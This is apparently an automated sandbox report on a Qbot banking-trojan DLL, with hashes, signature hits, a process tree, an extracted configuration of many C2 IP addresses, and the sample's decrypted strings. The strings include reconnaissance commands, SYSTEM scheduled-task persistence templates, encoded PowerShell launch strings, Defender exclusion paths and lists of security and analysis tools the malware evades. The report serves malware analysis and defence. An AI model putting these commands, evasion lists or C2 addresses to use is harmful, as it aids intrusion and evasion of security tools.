Edit tour

Windows Analysis Report
050_qbot.dll

Overview

General Information

Sample Name:	050_qbot.dll (renamed file extension from dat to dll, renamed because original name is a hash value)
Original Sample Name:	050_qbot.dat
Analysis ID:	882803
MD5:	bc4aed05e70290533ba126546e0989b0
SHA1:	c148fe036e3aa6a4dc5ce98b323cd8d76d978ac6
SHA256:	5ee244bbdd69f41b1df8e3736e09114603ee7d5e7520cae52424ed18642ca265
Infos:

Detection

Qbot

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Qbot

Multi AV Scanner detection for submitted file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Writes to foreign memory regions

Allocates memory in foreign processes

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Sample uses string decryption to hide its real strings

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Found evasive API chain (date check)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Checks if the current process is being debugged

Connects to several IPs in different countries

PE file contains more sections than normal

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 7304 cmdline: loaddll32.exe "C:\Users\user\Desktop\050_qbot.dll" MD5: 3B4636AE519868037940CA5C4272091B)

conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 7340 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 7360 cmdline: rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 7472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 176 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 7348 cmdline: rundll32.exe C:\Users\user\Desktop\050_qbot.dll,lcopy_block_row MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 7464 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 7576 cmdline: rundll32.exe C:\Users\user\Desktop\050_qbot.dll,lcopy_sample_rows MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7604 cmdline: rundll32.exe C:\Users\user\Desktop\050_qbot.dll,ldiv_round_up MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7644 cmdline: rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lcopy_block_row MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 7752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 7652 cmdline: rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lcopy_sample_rows MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7660 cmdline: rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",ldiv_round_up MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7680 cmdline: rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",next MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

wermgr.exe (PID: 7868 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)

rundll32.exe (PID: 7704 cmdline: rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lround_up MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7716 cmdline: rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lpeg_write_tables MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 7784 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7716 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
QakBot, qbotQbot	QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.	GOLD CABIN	http://contagiodump.blogspot.com/2010/11/template.html http://www.secureworks.com/research/threat-profiles/gold-lagoon http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7 https://asec.ahnlab.com/en/44662/	https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot

Malware Configuration

Threatname: Qbot

{"Bot id": "BB30", "Campaign": "1685686808", "Version": "404.1346", "C2 list": ["86.173.2.12:2222", "92.9.45.20:2222", "100.4.163.158:2222", "213.64.33.92:2222", "75.98.154.19:443", "78.192.109.105:2222", "88.126.94.4:50000", "70.28.50.223:2083", "92.154.17.149:2222", "24.234.220.88:993", "87.252.106.39:995", "174.4.89.3:443", "12.172.173.82:20", "90.29.86.138:2222", "70.160.67.203:443", "223.166.13.95:995", "184.181.75.148:443", "95.45.50.93:2222", "201.143.215.69:443", "64.121.161.102:443", "2.82.8.80:443", "188.28.19.84:443", "81.101.185.146:443", "79.77.142.22:2222", "84.215.202.8:443", "183.87.163.165:443", "74.12.147.139:2078", "74.12.147.139:2222", "74.12.147.139:2222", "74.12.147.139:2083", "70.28.50.223:2078", "94.204.202.106:443", "87.221.153.182:2222", "70.28.50.223:2087", "24.234.220.88:990", "2.49.63.160:2222", "72.205.104.134:443", "199.27.66.213:443", "83.249.198.100:2222", "90.104.151.37:2222", "116.75.63.183:443", "70.28.50.223:2078", "117.195.17.148:993", "77.126.99.230:443", "45.62.70.33:443", "24.234.220.88:465", "203.109.44.236:995", "75.109.111.89:443", "161.142.103.187:995", "77.86.98.236:443", "147.147.30.126:2222", "124.246.122.199:2222", "103.123.223.133:443", "180.151.19.13:2078", "176.142.207.63:443", "12.172.173.82:32101", "103.140.174.20:2222", "70.50.83.216:2222", "12.172.173.82:465", "38.2.18.164:443", "93.187.148.45:995", "70.64.77.115:443", "12.172.173.82:21", "70.49.205.198:2222", "27.0.48.233:443", "12.172.173.82:50001", "83.110.223.61:443", "103.141.50.43:995", "85.101.239.116:443", "103.42.86.42:995", "92.1.170.110:995", "81.229.117.95:2222", "124.122.47.148:443", "103.212.19.254:995", "103.139.242.6:443", "125.99.76.102:443", "50.68.186.195:443", "47.205.25.170:443", "12.172.173.82:993", "12.172.173.82:22", "70.28.50.223:32100", "79.168.224.165:2222", "121.121.108.120:995", "69.160.121.6:61201", "200.84.211.255:2222", "201.244.108.183:995", "93.187.148.45:443", "85.61.165.153:2222", "184.182.66.109:443", "175.156.217.7:2222", "70.28.50.223:3389", "114.143.176.236:443", "65.95.141.84:2222", "80.6.50.34:443", "12.172.173.82:2087", "47.199.241.39:443", "66.241.183.99:443", "113.11.92.30:443", "186.75.95.6:443", "125.99.69.178:443", "109.130.247.84:2222", "96.56.197.26:2222", "70.50.1.252:2222", "91.160.70.68:32100", "67.70.120.249:2222", "209.171.160.69:995", "98.163.227.79:443", "176.133.4.230:995", "24.234.220.88:995", "45.62.75.250:443", "200.44.198.47:2222", "173.17.45.60:443", "5.192.141.228:2222", "184.63.133.131:995", "70.28.50.223:2083", "78.82.143.154:2222", "73.88.173.113:443", "181.4.225.225:443", "24.234.220.88:443", "174.58.146.57:443"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000010.00000002.404593397.000000000294A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000010.00000002.405110425.00000000046D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
decrypted.memstr	JoeSecurity_Qbot	Yara detected Qbot	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
16.2.rundll32.exe.2960978.0.unpack	MAL_QakBot_ConfigExtraction_Feb23	QakBot Config Extraction	kevoreilly	0xe055:$params: 8B 7D 08 8B F1 57 89 55 FC E8 84 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9 0x9c7b:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
16.2.rundll32.exe.2960978.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
16.2.rundll32.exe.10000000.1.unpack	MAL_QakBot_ConfigExtraction_Feb23	QakBot Config Extraction	kevoreilly	0xec55:$params: 8B 7D 08 8B F1 57 89 55 FC E8 84 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9 0xa87b:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
16.2.rundll32.exe.10000000.1.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
16.2.rundll32.exe.2960978.0.raw.unpack	MAL_QakBot_ConfigExtraction_Feb23	QakBot Config Extraction	kevoreilly	0xec55:$params: 8B 7D 08 8B F1 57 89 55 FC E8 84 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9 0xa87b:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
16.2.rundll32.exe.2960978.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000010.00000002.404593397.000000000294A000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Qbot {"Bot id": "BB30", "Campaign": "1685686808", "Version": "404.1346", "C2 list": ["86.173.2.12:2222", "92.9.45.20:2222", "100.4.163.158:2222", "213.64.33.92:2222", "75.98.154.19:443", "78.192.109.105:2222", "88.126.94.4:50000", "70.28.50.223:2083", "92.154.17.149:2222", "24.234.220.88:993", "87.252.106.39:995", "174.4.89.3:443", "12.172.173.82:20", "90.29.86.138:2222", "70.160.67.203:443", "223.166.13.95:995", "184.181.75.148:443", "95.45.50.93:2222", "201.143.215.69:443", "64.121.161.102:443", "2.82.8.80:443", "188.28.19.84:443", "81.101.185.146:443", "79.77.142.22:2222", "84.215.202.8:443", "183.87.163.165:443", "74.12.147.139:2078", "74.12.147.139:2222", "74.12.147.139:2222", "74.12.147.139:2083", "70.28.50.223:2078", "94.204.202.106:443", "87.221.153.182:2222", "70.28.50.223:2087", "24.234.220.88:990", "2.49.63.160:2222", "72.205.104.134:443", "199.27.66.213:443", "83.249.198.100:2222", "90.104.151.37:2222", "116.75.63.183:443", "70.28.50.223:2078", "117.195.17.148:993", "77.126.99.230:443", "45.62.70.33:443", "24.234.220.88:465", "203.109.44.236:995", "75.109.111.89:443", "161.142.103.187:995", "77.86.98.236:443", "147.147.30.126:2222", "124.246.122.199:2222", "103.123.223.133:443", "180.151.19.13:2078", "176.142.207.63:443", "12.172.173.82:32101", "103.140.174.20:2222", "70.50.83.216:2222", "12.172.173.82:465", "38.2.18.164:443", "93.187.148.45:995", "70.64.77.115:443", "12.172.173.82:21", "70.49.205.198:2222", "27.0.48.233:443", "12.172.173.82:50001", "83.110.223.61:443", "103.141.50.43:995", "85.101.239.116:443", "103.42.86.42:995", "92.1.170.110:995", "81.229.117.95:2222", "124.122.47.148:443", "103.212.19.254:995", "103.139.242.6:443", "125.99.76.102:443", "50.68.186.195:443", "47.205.25.170:443", "12.172.173.82:993", "12.172.173.82:22", "70.28.50.223:32100", "79.168.224.165:2222", "121.121.108.120:995", "69.160.121.6:61201", "200.84.211.255:2222", "201.244.108.183:995", "93.187.148.45:443", "85.61.165.153:2222", "184.182.66.109:443", "175.156.217.7:2222", "70.28.50.223:3389", "114.143.176.236:443", "65.95.141.84:2222", "80.6.50.34:443", "12.172.173.82:2087", "47.199.241.39:443", "66.241.183.99:443", "113.11.92.30:443", "186.75.95.6:443", "125.99.69.178:443", "109.130.247.84:2222", "96.56.197.26:2222", "70.50.1.252:2222", "91.160.70.68:32100", "67.70.120.249:2222", "209.171.160.69:995", "98.163.227.79:443", "176.133.4.230:995", "24.234.220.88:995", "45.62.75.250:443", "200.44.198.47:2222", "173.17.45.60:443", "5.192.141.228:2222", "184.63.133.131:995", "70.28.50.223:2083", "78.82.143.154:2222", "73.88.173.113:443", "181.4.225.225:443", "24.234.220.88:443", "174.58.146.57:443"]}

Multi AV Scanner detection for submitted file

Source: 050_qbot.dll	ReversingLabs: Detection: 45%
Source: 050_qbot.dll	Virustotal: Detection: 57%			Perma Link

Sample uses string decryption to hide its real strings

Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: error res='%s' err=%d len=%u
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: netstat -nao
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: runas
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ipconfig /all
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: net localgroup
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: nltest /domain_trusts /all_trusts
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Microsoft
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SELF_TEST_1
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: p%08x
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Self test FAILED!!!
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Self test OK.
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: /t5
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: whoami /all
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: cmd
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: microsoft.com,google.com,cisco.com,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: route print
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: .lnk
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: arp -a
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %s "$%s = \"%s\"; & $%s"
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: net share
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: cmd.exe /c set
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Self check
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %u;%u;%u;
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ProfileImagePath
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: at.exe %u:%u "%s" /I
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ProgramData
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Self check ok!
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: powershell.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: qwinsta
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: net view
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Component_08
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Start screenshot
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: schtasks.exe /Delete /F /TN %u
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: appidapi.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %s \"$%s = \\\"%s\\\\; & $%s\"
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: c:\ProgramData
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Component_07
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: powershell.exe -encodedCommand %S
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ERROR: GetModuleFileNameW() failed with error: %u
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: powershell.exe -encodedCommand
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SoNuce]ugdiB3c[doMuce2s81*uXmcvP
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: \System32\WindowsPowerShell\v1.0\powershell.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: error res='%s' err=%d len=%u
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: netstat -nao
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: runas
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ipconfig /all
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %u.%u.%u.%u.%u.%u.%04x
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SystemRoot
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: cscript.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: MBAMService.exe;mbamgui.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\xwizard.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\wermgr.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: C:\INTERNAL\__empty
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: .dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Win32_PhysicalMemory
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: image/jpeg
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: LocalLow
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: displayName
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: shlwapi.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: CommandLine
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: kernel32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SubmitSamplesConsent
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: 1234567890
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: wbj.go
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\wextract.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Win32_DiskDrive
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: vkise.exe;isesrv.exe;cmdagent.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: System32
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Name
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\WerFault.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: WRSA.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: c:\\
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SpyNetReporting
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: FALSE
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: aswhookx.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Packages
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SonicWallClientProtectionService.exe;SWDash.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: application/x-shockwave-flash
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: RepUx.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\mspaint.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Winsta0
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\wermgr.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: avp.exe;kavtray.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: root\SecurityCenter2
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: MsMpEng.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: userenv.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: csc_ui.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: \\.\pipe\
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: pstorec.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: NTUSER.DAT
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: from
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\sethc.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: netapi32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\Utilman.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: gdi32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: setupapi.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SELECT * FROM Win32_Processor
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: iphlpapi.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Caption
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: CrAmTray.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Win32_ComputerSystem
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: user32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: xagtnotif.exe;AppUIMonitor.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\dxdiag.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: \sf2.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\grpconv.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: egui.exe;ekrn.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Software\Microsoft
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %S.%06d
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: bcrypt.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SELECT * FROM AntiVirusProduct
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\SndVol.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\Utilman.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: wtsapi32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
